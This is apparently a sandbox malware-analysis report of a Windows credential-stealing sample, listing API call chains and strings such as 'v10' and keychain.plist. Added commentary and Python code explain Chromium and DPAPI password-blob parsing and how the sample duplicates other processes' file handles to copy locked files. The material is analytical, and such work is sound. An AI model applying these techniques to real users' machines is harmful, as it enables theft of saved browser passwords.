                      • API ID: AddressProc$Handle_wcsicmp$CloseProcess$CurrentFileModulememset$??2@ChangeCreateDuplicateFindInformationNameNotificationOpenQuerySystem
                      • String ID: dllhost.exe$taskhost.exe$taskhostex.exe
                      • API String ID: 594330280-3398334509
                      • Opcode ID: c0cdbd66bb0eb3cac082432fda8d0328b9155cc6ebf5e989b7bcc70ed293d7d6
                      • Instruction ID: 75e999e9478e2cd8c236028a88c267773407d5e0538ee9298daa3020847ac7a6
                      • Opcode Fuzzy Hash: c0cdbd66bb0eb3cac082432fda8d0328b9155cc6ebf5e989b7bcc70ed293d7d6
                      • Instruction Fuzzy Hash: 57818F71D00209AFEB10EF95CC81AAEBBB5FF04345F20407AF915B6291DB399E95CB58

                      Control-flow Graph (function 413d4c; executed/not-executed node listing not reproduced)
                      APIs
                        • Part of subcall function 0040B633: ??3@YAXPAX@Z.MSVCRT ref: 0040B63A
                      • CreateToolhelp32Snapshot.KERNEL32(00000002,00000000), ref: 00413D6A
                      • memset.MSVCRT ref: 00413D7F
                      • Process32FirstW.KERNEL32(00000000,?), ref: 00413D9B
                      • OpenProcess.KERNEL32(00000410,00000000,?,?,?,?), ref: 00413DE0
                      • memset.MSVCRT ref: 00413E07
                      • GetModuleHandleW.KERNEL32(kernel32.dll,00000000,?), ref: 00413E3C
                      • GetProcAddress.KERNEL32(00000000,QueryFullProcessImageNameW), ref: 00413E56
                      • CloseHandle.KERNEL32(?,?,?,?,00000000,?), ref: 00413EA8
                      • ??3@YAXPAX@Z.MSVCRT ref: 00413EC1
                      • Process32NextW.KERNEL32(00000000,0000022C), ref: 00413F0A
                      • CloseHandle.KERNEL32(00000000,00000000,0000022C), ref: 00413F1A
                      Memory Dump Source
                      • Source File: 00000014.00000002.1807424206.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_20_2_400000_wab.jbxd
                      Similarity
                      • API ID: Handle$??3@CloseProcess32memset$AddressCreateFirstModuleNextOpenProcProcessSnapshotToolhelp32
                      • String ID: QueryFullProcessImageNameW$kernel32.dll
                      • API String ID: 912665193-1740548384
                      • Opcode ID: d01459b62e4562fe598c3dda65fe2a12e31c3c57d7bea03f0a3dc75513a8eb61
                      • Instruction ID: a891ebf292d3308fa7e32b9fbc5d589fb36fb38cf1b6cbdc37d41f3709903cdc
                      • Opcode Fuzzy Hash: d01459b62e4562fe598c3dda65fe2a12e31c3c57d7bea03f0a3dc75513a8eb61
                      • Instruction Fuzzy Hash: B4518FB2C00218ABDB10DF5ACC84ADEF7B9AF95305F1041ABE509A3251D7795F84CFA9
                      APIs
                      • GetModuleHandleW.KERNEL32(00000000,00000000,?,?), ref: 0040B5A5
                      • FindResourceW.KERNELBASE(00000000,00000032,BIN), ref: 0040B5B6
                      • LoadResource.KERNEL32(00000000,00000000), ref: 0040B5C4
                      • SizeofResource.KERNEL32(?,00000000), ref: 0040B5D4
                      • LockResource.KERNEL32(00000000), ref: 0040B5DD
                      • memcpy.MSVCRT ref: 0040B60D
                      Strings
                      Memory Dump Source
                      • Source File: 00000014.00000002.1807424206.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_20_2_400000_wab.jbxd
                      Similarity
                      • API ID: Resource$FindHandleLoadLockModuleSizeofmemcpy
                      • String ID: BIN
                      • API String ID: 1668488027-1015027815
                      • Opcode ID: 6cadd12acd146c90b5568bc01b4485451bf9b169e768bef5838699a2d497f07b
                      • Instruction ID: e905eb6dc449d61379ecdc49350c1a2f8866219970738eecada31b95dd052af9
                      • Opcode Fuzzy Hash: 6cadd12acd146c90b5568bc01b4485451bf9b169e768bef5838699a2d497f07b
                      • Instruction Fuzzy Hash: 5E11C636C00225BBD7116BE2DC09AAFBA78FF85755F010476F81072292DB794D018BED
                      APIs
                        • Part of subcall function 00418680: GetFullPathNameW.KERNEL32(00000000,00000000,00000000,00000000,00000000,?,00000000,00000000,?,00000000), ref: 004186AC
                        • Part of subcall function 00418680: malloc.MSVCRT ref: 004186B7
                        • Part of subcall function 00418680: ??3@YAXPAX@Z.MSVCRT ref: 004186C7
                        • Part of subcall function 0041739B: GetVersionExW.KERNEL32(?), ref: 004173BE
                      • GetDiskFreeSpaceW.KERNELBASE(00000000,?,00000200,?,?,?,00000000,?,00000000), ref: 004187D2
                      • GetDiskFreeSpaceA.KERNEL32(00000000,?,00000200,?,?,?,00000000,?,00000000), ref: 004187FA
                      • ??3@YAXPAX@Z.MSVCRT ref: 00418803
                      Memory Dump Source
                      • Source File: 00000014.00000002.1807424206.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_20_2_400000_wab.jbxd
                      Similarity
                      • API ID: ??3@DiskFreeSpace$FullNamePathVersionmalloc
                      • String ID:
                      • API String ID: 2947809556-0
                      • Opcode ID: 7494654f5416982ac8b8eb6095e1b911d56786f256e13b4958c27deb7a97d588
                      • Instruction ID: 9f5aa8738ec5ca8fa6c7af21032fcab0d24b7c3e7281463e4f88d86f77cdc7da
                      • Opcode Fuzzy Hash: 7494654f5416982ac8b8eb6095e1b911d56786f256e13b4958c27deb7a97d588
                      • Instruction Fuzzy Hash: 2A218776904118AEEB11EBA4CC849EF77BCEF05704F2404AFE551D7181EB784EC58769
                      APIs
                      • FindFirstFileW.KERNELBASE(?,?,?,00000000,00445F58,*.*,?,00000000,?,00000104,?,?,?,?,?,00000104), ref: 0040AE67
                      • FindNextFileW.KERNELBASE(?,?,?,00000000,00445F58,*.*,?,00000000,?,00000104,?,?,?,?,?,00000104), ref: 0040AE83
                      Memory Dump Source
                      • Source File: 00000014.00000002.1807424206.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_20_2_400000_wab.jbxd
                      Similarity
                      • API ID: FileFind$FirstNext
                      • String ID:
                      • API String ID: 1690352074-0
                      • Opcode ID: 561b3503b5d493cb0f99635c99673ff26dffc0bbfdea02a94e907e6f5a7ee62d
                      • Instruction ID: bc213c2af839868520f9a45b85e911a0cf9bcc257b6b56acf9ba21b23a9e6198
                      • Opcode Fuzzy Hash: 561b3503b5d493cb0f99635c99673ff26dffc0bbfdea02a94e907e6f5a7ee62d
                      • Instruction Fuzzy Hash: 34F0C877040B005BD761C774D8489C733D89F84320B20063EF56AD32C0EB3899098755
                      APIs
                      • memset.MSVCRT ref: 0041898C
                      • GetSystemInfo.KERNELBASE(004725C0,?,00000000,004439D6,?,00445FAE,?,?,?,?,?,?), ref: 00418995
                      Memory Dump Source
                      • Source File: 00000014.00000002.1807424206.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_20_2_400000_wab.jbxd
                      Similarity
                      • API ID: InfoSystemmemset
                      • String ID:
                      • API String ID: 3558857096-0
                      • Opcode ID: d0407614e71e7ae135e22cefa727abc0102cb379ef2ade91b8070469c4ed11d1
                      • Instruction ID: bf8bfd662ffca2911032058da6995c9eeb4a28626cb6ee34ade21af96d3a2c90
                      • Opcode Fuzzy Hash: d0407614e71e7ae135e22cefa727abc0102cb379ef2ade91b8070469c4ed11d1
                      • Instruction Fuzzy Hash: C0E06531A0163097F22077766C067DF25949F41395F04407BB9049A186EBAC4D8546DE

                      Control-flow Graph

                      Executed / not-executed graph for 0044553B-00445FB2 not reproduced (node list omitted; the calls it shows are listed under APIs below).
                      APIs
                      • memset.MSVCRT ref: 004455C2
                      • wcsrchr.MSVCRT ref: 004455DA
                      • memset.MSVCRT ref: 0044570D
                      • memset.MSVCRT ref: 00445725
                        • Part of subcall function 0040C768: _wcslwr.MSVCRT ref: 0040C817
                        • Part of subcall function 0040C768: wcslen.MSVCRT ref: 0040C82C
                        • Part of subcall function 0040BDB0: CredEnumerateW.ADVAPI32(00000000,00000000,?,?,?,00000000,?), ref: 0040BDE9
                        • Part of subcall function 0040BDB0: wcslen.MSVCRT ref: 0040BE06
                        • Part of subcall function 0040BDB0: _wcsncoll.MSVCRT ref: 0040BE38
                        • Part of subcall function 0040BDB0: memset.MSVCRT ref: 0040BE91
                        • Part of subcall function 0040BDB0: memcpy.MSVCRT ref: 0040BEB2
                        • Part of subcall function 004135F7: GetProcAddress.KERNEL32(?,00000000), ref: 0041362A
                      • memset.MSVCRT ref: 0044573D
                      • memset.MSVCRT ref: 00445755
                      • memset.MSVCRT ref: 004458CB
                      • memset.MSVCRT ref: 004458E3
                      • memset.MSVCRT ref: 0044596E
                      • memset.MSVCRT ref: 00445A10
                      • memset.MSVCRT ref: 00445A28
                      • memset.MSVCRT ref: 00445AC6
                        • Part of subcall function 00445093: GetFileSize.KERNEL32(00000000,00000000,?,00000000,00000104,00445E7E,?,?,?,?,00000104), ref: 004450AA
                        • Part of subcall function 00445093: ??2@YAPAXI@Z.MSVCRT ref: 004450BE
                        • Part of subcall function 00445093: memset.MSVCRT ref: 004450CD
                        • Part of subcall function 00445093: ??3@YAXPAX@Z.MSVCRT ref: 004450F0
                        • Part of subcall function 00445093: CloseHandle.KERNEL32(00000000,?,?,00000104), ref: 004450F7
                      • memset.MSVCRT ref: 00445B52
                      • memset.MSVCRT ref: 00445B6A
                      • memset.MSVCRT ref: 00445C9B
                      • memset.MSVCRT ref: 00445CB3
                      • _wcsicmp.MSVCRT ref: 00445D56
                      • memset.MSVCRT ref: 00445B82
                        • Part of subcall function 0040B6EF: memset.MSVCRT ref: 0040B71C
                        • Part of subcall function 0040B6EF: wcsrchr.MSVCRT ref: 0040B738
                        • Part of subcall function 0040B6EF: memset.MSVCRT ref: 0040B756
                        • Part of subcall function 0040B6EF: memset.MSVCRT ref: 0040B7F5
                        • Part of subcall function 0040B6EF: CreateFileW.KERNELBASE(00445FAE,80000000,00000000,00000000,00000003,00000000,00000000,?,?), ref: 0040B80C
                        • Part of subcall function 0040ADD4: wcscmp.MSVCRT ref: 0040ADF3
                        • Part of subcall function 0040ADD4: wcscmp.MSVCRT ref: 0040AE04
                      • memset.MSVCRT ref: 00445986
                        • Part of subcall function 00409D1F: wcslen.MSVCRT ref: 00409D29
                        • Part of subcall function 00409D1F: wcslen.MSVCRT ref: 00409D33
                        • Part of subcall function 00409D1F: wcscpy.MSVCRT ref: 00409D47
                        • Part of subcall function 00409D1F: wcscat.MSVCRT ref: 00409D55
                        • Part of subcall function 00409B98: GetFileAttributesW.KERNELBASE(?,00445E12,?,?,?,00000104), ref: 00409B9C
                      Strings
                      Memory Dump Source
                      • Source File: 00000014.00000002.1807424206.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_20_2_400000_wab.jbxd
                      Similarity
                      • API ID: memset$wcslen$File$wcscmpwcsrchr$??2@??3@AddressAttributesCloseCreateCredEnumerateHandleProcSize_wcsicmp_wcslwr_wcsncollmemcpywcscatwcscpy
                      • String ID: *.*$Apple Computer\Preferences\keychain.plist
                      • API String ID: 2745753283-3798722523
                      • Opcode ID: 60142fc224ce82f33f024026baff3817031bc91c0ca8ee6e0e9eeeaa230f4715
                      • Instruction ID: 0d822d17a5609fa1e1b699618fc72e24fb48bc28b5d87ede4d5502c71e25afa2
                      • Opcode Fuzzy Hash: 60142fc224ce82f33f024026baff3817031bc91c0ca8ee6e0e9eeeaa230f4715
                      • Instruction Fuzzy Hash: ED4278B29005196BEB10E761DD46EDFB37CEF45358F1001ABF508A2193EB385E948B9A

                      Control-flow Graph

                      APIs
                        • Part of subcall function 004044A4: LoadLibraryW.KERNEL32(comctl32.dll), ref: 004044C3
                        • Part of subcall function 004044A4: GetProcAddress.KERNEL32(00000000,InitCommonControlsEx), ref: 004044D5
                        • Part of subcall function 004044A4: FreeLibrary.KERNEL32(00000000), ref: 004044E9
                        • Part of subcall function 004044A4: MessageBoxW.USER32(00000001,Error: Cannot load the common control classes.,Error,00000030), ref: 00404514
                      • SetErrorMode.KERNELBASE(00008001), ref: 00412799
                      • GetModuleHandleW.KERNEL32(00000000,0041493C,00000000), ref: 004127B2
                      • EnumResourceTypesW.KERNEL32(00000000), ref: 004127B9
                      Strings
                      Memory Dump Source
                      • Source File: 00000014.00000002.1807424206.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_20_2_400000_wab.jbxd
                      Similarity
                      • API ID: Library$AddressEnumErrorFreeHandleLoadMessageModeModuleProcResourceTypes
                      • String ID: $/deleteregkey$/savelangfile
                      • API String ID: 2744995895-28296030
                      • Opcode ID: 72338f9f39f0fed86814d702f01b1d2779e3084bd08ead6f54537fd18a2fe269
                      • Instruction ID: bb1d383b9f388563dc7403a66819e695bb2bbb53a4e653fbe84b6d7681309d95
                      • Opcode Fuzzy Hash: 72338f9f39f0fed86814d702f01b1d2779e3084bd08ead6f54537fd18a2fe269
                      • Instruction Fuzzy Hash: FC51BEB1608346ABD710AFA6DD88A9F77ECFF81304F40092EF644D2161D778E8558B2A

                      Control-flow Graph

                      APIs
                      • memset.MSVCRT ref: 0040B71C
                        • Part of subcall function 00409C70: wcscpy.MSVCRT ref: 00409C75
                        • Part of subcall function 00409C70: wcsrchr.MSVCRT ref: 00409C7D
                      • wcsrchr.MSVCRT ref: 0040B738
                      • memset.MSVCRT ref: 0040B756
                      • memset.MSVCRT ref: 0040B7F5
                      • CreateFileW.KERNELBASE(00445FAE,80000000,00000000,00000000,00000003,00000000,00000000,?,?), ref: 0040B80C
                      • CopyFileW.KERNEL32(00445FAE,?,00000000,?,?), ref: 0040B82D
                      • FindCloseChangeNotification.KERNELBASE(00000000,?,?), ref: 0040B838
                      • memset.MSVCRT ref: 0040B851
                      • memset.MSVCRT ref: 0040B8CA
                      • memcmp.MSVCRT ref: 0040B9BF
                        • Part of subcall function 00404423: GetProcAddress.KERNEL32(?,00000000), ref: 00404453
                        • Part of subcall function 00404423: FreeLibrary.KERNEL32(00000000,00000141,?,00000000,?,004026E9,?,?,00000000,?), ref: 00404476
                      • DeleteFileW.KERNEL32(?,?,?,?,?,?,?,?,?,?), ref: 0040BAE5
                      • memset.MSVCRT ref: 0040BB53
                      • memcpy.MSVCRT ref: 0040BB66
                      • LocalFree.KERNEL32(00000000,?,?,?,00000000,00000000,?), ref: 0040BB8D
                      Strings
                      Memory Dump Source
                      • Source File: 00000014.00000002.1807424206.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_20_2_400000_wab.jbxd
                      Similarity
                      • API ID: memset$File$Freewcsrchr$AddressChangeCloseCopyCreateDeleteFindLibraryLocalNotificationProcmemcmpmemcpywcscpy
                      • String ID: chp$v10
                      • API String ID: 170802307-2783969131
                      • Opcode ID: aa7ff03ddb8a60b54c19e14ecab6b10a2ad5bd81823861da0c4d13f19dc0bdfc
                      • Instruction ID: 8b5aa87907ec6e815121f1c024adfc7170cbdef62e19f7af032d1a0a82a34a86
                      • Opcode Fuzzy Hash: aa7ff03ddb8a60b54c19e14ecab6b10a2ad5bd81823861da0c4d13f19dc0bdfc
                      • Instruction Fuzzy Hash: 32D17372900218AFEB11EB95DC41EEE77B8EF44304F1044BAF509B7191DB789F858B99
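The function above copies a file aside (CreateFileW, CopyFileW), compares a three-byte prefix against the string v10 (memcmp) and releases a buffer with LocalFree. The report does not name the browser, but that combination is the shape of a Chromium saved-password reader: copying the database sidesteps the lock the running browser holds on it, v10 is the prefix Chromium's OSCrypt puts on AES-256-GCM values on Windows (key wrapped by DPAPI in the profile's Local State), and any value without that prefix is a raw DPAPI blob handed to CryptUnprotectData, whose output buffer is freed with LocalFree. The block below is an added example, not code from the report or from the sample: it triages such a value offline, splitting a v10 value into nonce, ciphertext and tag, and parsing a DPAPI blob header far enough to recover the master key GUID that tells an analyst which master key file under the user's Protect directory the value depends on. Both input blobs are constructed; no key material is involved and nothing is decrypted.

```python
"""Triage of a Chromium-style encrypted credential value (added example).

Two shapes are handled:
  * b"v10" + 12-byte GCM nonce + ciphertext + 16-byte GCM tag
    (Chromium on Windows: AES-256-GCM, key kept DPAPI-wrapped in Local State)
  * a raw DPAPI blob (older profiles, or anything CryptProtectData produced):
    version, provider GUID, master-key version, master-key GUID, flags,
    description, then algorithm / salt / HMAC / data / signature sections.
The sample blobs at the bottom are constructed for the example; nothing is decrypted.
"""
import struct
import uuid

CHROMIUM_V10_PREFIX = b"v10"
# Fixed provider GUID present at offset 4 of every DPAPI blob
DPAPI_PROVIDER_GUID = uuid.UUID("df9d8cd0-1501-11d1-8c7a-00c04fc297eb")
GCM_NONCE_LEN = 12
GCM_TAG_LEN = 16


def _guid(raw: bytes) -> uuid.UUID:
    # Windows stores GUIDs little-endian (bytes_le), not in RFC 4122 byte order
    return uuid.UUID(bytes_le=raw)


def parse_v10(blob: bytes) -> dict:
    """Split a v10 value into the parts AES-GCM needs; raises on malformed input."""
    if not blob.startswith(CHROMIUM_V10_PREFIX):
        raise ValueError("not a v10 value")
    body = blob[len(CHROMIUM_V10_PREFIX):]
    if len(body) < GCM_NONCE_LEN + GCM_TAG_LEN:
        raise ValueError("v10 value too short for nonce and tag")
    return {
        "scheme": "chromium-aes-gcm",
        "nonce": body[:GCM_NONCE_LEN],
        "ciphertext": body[GCM_NONCE_LEN:-GCM_TAG_LEN],
        "tag": body[-GCM_TAG_LEN:],
    }


def parse_dpapi_header(blob: bytes) -> dict:
    """Parse the head of a DPAPI blob up to and including the salt."""
    off = 0
    (version,) = struct.unpack_from("<I", blob, off); off += 4
    provider = _guid(blob[off:off + 16]); off += 16
    if version != 1 or provider != DPAPI_PROVIDER_GUID:
        raise ValueError("not a DPAPI blob (bad version or provider GUID)")
    (mk_version,) = struct.unpack_from("<I", blob, off); off += 4
    master_key = _guid(blob[off:off + 16]); off += 16
    flags, desc_len = struct.unpack_from("<II", blob, off); off += 8
    description = blob[off:off + desc_len].decode("utf-16-le").rstrip("\x00")
    off += desc_len
    alg_crypt, alg_crypt_len, salt_len = struct.unpack_from("<III", blob, off); off += 12
    salt = blob[off:off + salt_len]
    return {
        "scheme": "dpapi",
        "master_key_guid": str(master_key),   # name of the master key file to look for
        "master_key_version": mk_version,
        "flags": flags,
        "description": description,
        "alg_crypt": alg_crypt,               # CALG_* id, e.g. 0x6610 = CALG_AES_256
        "alg_crypt_len": alg_crypt_len,       # key length in bits
        "salt": salt,
    }


def triage(blob: bytes) -> dict:
    """Dispatch on the v10 prefix; anything else must be a DPAPI blob."""
    if blob.startswith(CHROMIUM_V10_PREFIX):
        return parse_v10(blob)
    return parse_dpapi_header(blob)


def build_dpapi_blob(master_key: uuid.UUID, description: str, salt: bytes) -> bytes:
    """Construct a synthetic DPAPI blob head for the example (not a real ciphertext)."""
    desc = (description + "\x00").encode("utf-16-le")
    return (struct.pack("<I", 1) + DPAPI_PROVIDER_GUID.bytes_le
            + struct.pack("<I", 1) + master_key.bytes_le
            + struct.pack("<II", 0, len(desc)) + desc
            + struct.pack("<III", 0x6610, 256, len(salt)) + salt)


# Constructed samples; none of these bytes come from the analysed file
SAMPLE_V10 = b"v10" + bytes(range(12)) + b"ciphertext-bytes" + bytes(16)
SAMPLE_MK = uuid.UUID("8a4d2b2f-6d3c-4f5a-9c1e-0123456789ab")
SAMPLE_DPAPI = build_dpapi_blob(SAMPLE_MK, "Chromium", b"\x11" * 32)

if __name__ == "__main__":
    for blob in (SAMPLE_V10, SAMPLE_DPAPI):
        info = triage(blob)
        print(info["scheme"], info.get("master_key_guid") or info["nonce"].hex())
```

For a v10 value the recovered nonce and tag feed AES-256-GCM with the key obtained from os_crypt.encrypted_key in Local State (base64-decoded, its DPAPI prefix stripped, then unprotected in the victim's user context); for a DPAPI blob the master key GUID names the file that must be decrypted with the user's password or backup key before the value can be read. The example stops at the parsing step on purpose.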

                      Control-flow Graph

                      Executed / not-executed graph for 0040E2AB-0040E4AF not reproduced (node list omitted; the calls it shows are listed under APIs below).
                      APIs
                        • Part of subcall function 00406B90: _wcsicmp.MSVCRT ref: 00406BC1
                        • Part of subcall function 00406E8F: memset.MSVCRT ref: 00406F8B
                      • ??3@YAXPAX@Z.MSVCRT ref: 0040E49A
                        • Part of subcall function 0040DD50: _wcsicmp.MSVCRT ref: 0040DD69
                      • memset.MSVCRT ref: 0040E380
                        • Part of subcall function 0040AA29: wcslen.MSVCRT ref: 0040AA3C
                        • Part of subcall function 0040AA29: memcpy.MSVCRT ref: 0040AA5B
                      • wcschr.MSVCRT ref: 0040E3B8
                      • memcpy.MSVCRT ref: 0040E3EC
                      • memcpy.MSVCRT ref: 0040E407
                      • memcpy.MSVCRT ref: 0040E422
                      • memcpy.MSVCRT ref: 0040E43D
                      Strings
                      Memory Dump Source
                      • Source File: 00000014.00000002.1807424206.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_20_2_400000_wab.jbxd
                      Similarity
                      • API ID: memcpy$_wcsicmpmemset$??3@wcschrwcslen
                      • String ID: $AccessCount$AccessedTime$CreationTime$EntryID$ExpiryTime$ModifiedTime$Url
                      • API String ID: 3073804840-2252543386
                      • Opcode ID: c30480054a5ca474dc40abe6212bc187cfeb1b733cbf080f7a891c76daa1d321
                      • Instruction ID: 3bb3cf654da2d90f893253d259683e8481abe175d229eeda5eb464894a91a1db
                      • Opcode Fuzzy Hash: c30480054a5ca474dc40abe6212bc187cfeb1b733cbf080f7a891c76daa1d321
                      • Instruction Fuzzy Hash: DA512071E00309ABDF10EFA6DC45B9EB7B8AF54305F15443BA904F7291E678AA14CB58

                      Control-flow Graph

                      Executed / not-executed graph for 004091B8-00409526 not reproduced (node list omitted; the calls it shows are listed under APIs below).
                      APIs
                      Strings
                      Memory Dump Source
                      • Source File: 00000014.00000002.1807424206.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_20_2_400000_wab.jbxd
                      Similarity
                      • API ID: memcpy$memcmp$ByteCharMultiWidememset
                      • String ID:
                      • API String ID: 3715365532-3916222277
                      • Opcode ID: 84d8fa7e2563b014b86416b64341180d82413736d9254b8658418cb4f91a0b1c
                      • Instruction ID: d5c0d9b4f94ac501fd0f2fb5594fd033b2d13f4c98b4255323c8c53c7695c3f7
                      • Opcode Fuzzy Hash: 84d8fa7e2563b014b86416b64341180d82413736d9254b8658418cb4f91a0b1c
                      • Instruction Fuzzy Hash: DDA1BA71900605ABDB21EF65D885BAFB7BCAF44304F01043FF945E6282EB78EA458B59

                      Control-flow Graph

                      APIs
                        • Part of subcall function 0040DD85: memset.MSVCRT ref: 0040DDAD
                        • Part of subcall function 0040DD85: CreateFileW.KERNELBASE(?,80000000,00000003,00000000,00000003,00000000,00000000,?,000000FF,00000000,00000104), ref: 0040DDD4
                        • Part of subcall function 0040DD85: NtQuerySystemInformation.NTDLL(00000010,00000104,00001000,00000000,?,000000FF,00000000,00000104), ref: 0040DE15
                        • Part of subcall function 0040DD85: FindCloseChangeNotification.KERNELBASE(C0000004,?,000000FF,00000000,00000104), ref: 0040DE3E
                        • Part of subcall function 0040DD85: GetCurrentProcessId.KERNEL32(?,000000FF,00000000,00000104), ref: 0040DE49
                        • Part of subcall function 0040DD85: _wcsicmp.MSVCRT ref: 0040DEB2
                        • Part of subcall function 0040AFCF: ??2@YAPAXI@Z.MSVCRT ref: 0040AFD8
                      • OpenProcess.KERNEL32(00000040,00000000,00000000,00000104,?,00000000,00000104,?,00000000,00000104,00000000), ref: 0040E093
                      • GetCurrentProcess.KERNEL32(?,80000000,00000000,00000000), ref: 0040E0B2
                      • DuplicateHandle.KERNELBASE(?,00000104,00000000), ref: 0040E0BF
                      • GetFileSize.KERNEL32(?,00000000), ref: 0040E0D4
                        • Part of subcall function 00409A45: GetTempPathW.KERNEL32(00000104,?,00445FAE), ref: 00409A5C
                        • Part of subcall function 00409A45: GetWindowsDirectoryW.KERNEL32(?,00000104), ref: 00409A6E
                        • Part of subcall function 00409A45: GetTempFileNameW.KERNELBASE(?,0040B827,00000000,?), ref: 00409A85
                        • Part of subcall function 004096DC: CreateFileW.KERNELBASE(00000001,40000000,00000001,00000000,00000002,00000000,00000000,0040E0F1,00000104), ref: 004096EE
                      • CreateFileMappingW.KERNELBASE(?,00000000,00000002,00000000,00000000,00000000), ref: 0040E0FE
                      • MapViewOfFile.KERNELBASE(00000000,00000004,00000000,00000000,00000104), ref: 0040E113
                      • WriteFile.KERNELBASE(00000000,00000000,00000104,0040E6A3,00000000), ref: 0040E12E
                      • UnmapViewOfFile.KERNEL32(00000000), ref: 0040E135
                      • FindCloseChangeNotification.KERNELBASE(?), ref: 0040E13E
                      • CloseHandle.KERNEL32(00000000), ref: 0040E143
                      • CloseHandle.KERNEL32(?), ref: 0040E148
                      • CloseHandle.KERNEL32(?), ref: 0040E14D
                      Strings
                      Memory Dump Source
                      • Source File: 00000014.00000002.1807424206.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_20_2_400000_wab.jbxd
                      Similarity
                      • API ID: File$Close$Handle$CreateProcess$ChangeCurrentFindNotificationTempView$??2@DirectoryDuplicateInformationMappingNameOpenPathQuerySizeSystemUnmapWindowsWrite_wcsicmpmemset
                      • String ID: bhv
                      • API String ID: 327780389-2689659898
                      • Opcode ID: c96677cf1f2b88af9f6f98c954d74ea01aac065ab95576d822b7ccb478d5ef78
                      • Instruction ID: 69536691d8562172d0558c987aea6dfe4ed17d6a9a6de0cf2c6621a9a97a0e87
                      • Opcode Fuzzy Hash: c96677cf1f2b88af9f6f98c954d74ea01aac065ab95576d822b7ccb478d5ef78
                      • Instruction Fuzzy Hash: 15412775800218FBCF119FA6CC489DFBFB9FF09750F148466F504A6250D7748A50CBA8
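The call chain above (NtQuerySystemInformation with class 0x10, SystemHandleInformation; OpenProcess with access mask 0x40, PROCESS_DUP_HANDLE; DuplicateHandle; GetFileSize; CreateFileMappingW with protection 2, PAGE_READONLY; MapViewOfFile with access 4, FILE_MAP_READ; WriteFile into a GetTempFileNameW-named file) is the usual way to copy a file that another process holds open with exclusive sharing: the caller opens the file itself so that it knows the kernel object address behind its own handle, walks the system handle table for handles in other processes that point at the same object, duplicates one of them into its own process and dumps the mapped content to a temporary file. The block below is an added example, not code from the report or from the sample. It implements only the table-walking step on a constructed buffer, using the 32-bit SYSTEM_HANDLE_TABLE_ENTRY_INFO layout (the analysed image is a 32-bit PE; the 64-bit record is 24 bytes and differs). The process IDs, handle values, object addresses and the object type index are invented.

```python
"""Walk a SystemHandleInformation buffer and find handles in other processes that
alias the kernel object behind one of our own handles (added example).

32-bit layout of the buffer returned for information class 0x10:
    ULONG NumberOfHandles
    SYSTEM_HANDLE_TABLE_ENTRY_INFO Handles[NumberOfHandles], each 16 bytes:
        USHORT UniqueProcessId; USHORT CreatorBackTraceIndex;
        UCHAR ObjectTypeIndex;  UCHAR HandleAttributes; USHORT HandleValue;
        PVOID Object;           ULONG GrantedAccess
The buffer used here is constructed, not captured from the sample.
"""
import struct
from collections import namedtuple

ENTRY_FMT = "<HHBBHII"                     # pid, backtrace, type, attrs, handle, object, access
ENTRY_SIZE = struct.calcsize(ENTRY_FMT)    # 16 bytes on 32-bit Windows
HEADER_SIZE = 4

HandleEntry = namedtuple("HandleEntry", "pid type_index attrs handle object access")


def parse_system_handle_information(buf: bytes) -> list:
    """Decode the count-prefixed array; a short buffer is an error, not a partial result."""
    (count,) = struct.unpack_from("<I", buf, 0)
    needed = HEADER_SIZE + count * ENTRY_SIZE
    if len(buf) < needed:
        raise ValueError(f"buffer truncated: need {needed} bytes, have {len(buf)}")
    entries = []
    for i in range(count):
        pid, _bt, typ, attrs, handle, obj, access = struct.unpack_from(
            ENTRY_FMT, buf, HEADER_SIZE + i * ENTRY_SIZE)
        entries.append(HandleEntry(pid, typ, attrs, handle, obj, access))
    return entries


def find_aliases(entries: list, my_pid: int, my_handle: int) -> list:
    """Handles in *other* processes that refer to the same kernel object as (my_pid, my_handle).

    Each returned entry is a candidate for OpenProcess(PROCESS_DUP_HANDLE, pid) followed by
    DuplicateHandle(handle), which is the next step in the chain the report shows.
    """
    mine = [e for e in entries if e.pid == my_pid and e.handle == my_handle]
    if not mine:
        raise LookupError("own handle not present in the snapshot")
    target = mine[0].object
    return [e for e in entries if e.object == target and e.pid != my_pid]


def build_buffer(entries: list) -> bytes:
    """Serialise entries in the layout above (used only to construct the sample)."""
    out = struct.pack("<I", len(entries))
    for e in entries:
        out += struct.pack(ENTRY_FMT, e.pid, 0, e.type_index, e.attrs, e.handle, e.object, e.access)
    return out


# Constructed sample. The ObjectTypeIndex for File objects differs between Windows
# builds; 0x1C here is an arbitrary placeholder and the matching does not rely on it.
FILE_TYPE = 0x1C
SAMPLE_ENTRIES = [
    HandleEntry(1234, FILE_TYPE, 0, 0x0F4, 0x8A1B2C30, 0x00120089),  # our own open on the locked file
    HandleEntry(4321, FILE_TYPE, 0, 0x2A8, 0x8A1B2C30, 0x0012019F),  # owning process, same object
    HandleEntry(4321, FILE_TYPE, 0, 0x2AC, 0x8A1B9F00, 0x0012019F),  # unrelated file, same process
    HandleEntry(4,    FILE_TYPE, 0, 0x010, 0x8A1B2C30, 0x00000000),  # System also references it
]
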